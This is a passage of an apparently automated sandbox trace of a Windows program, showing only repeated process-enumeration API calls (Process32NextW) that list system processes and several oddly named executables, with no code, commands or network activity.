th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0140.832] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.833] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0140.834] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0140.835] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0140.836] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0140.836] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.837] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.838] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.839] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.840] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0140.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0140.845] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0140.848] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0140.849] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0140.850] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0141.127] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.128] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0141.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0141.133] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0141.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0141.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0141.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0141.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0141.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0141.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0141.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0141.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0141.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0141.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0141.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0141.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0141.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0141.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0141.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0141.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0141.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0141.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0141.162] CloseHandle (hObject=0xc4) returned 1 [0141.162] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0141.167] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0141.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0141.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0141.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0141.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0141.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0141.230] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0141.231] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0141.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.234] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0141.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0141.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0141.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0141.244] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0141.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.247] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0141.248] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0141.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0141.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0141.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0141.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0141.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0141.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0141.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0141.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0141.259] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0141.261] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0141.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0141.263] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 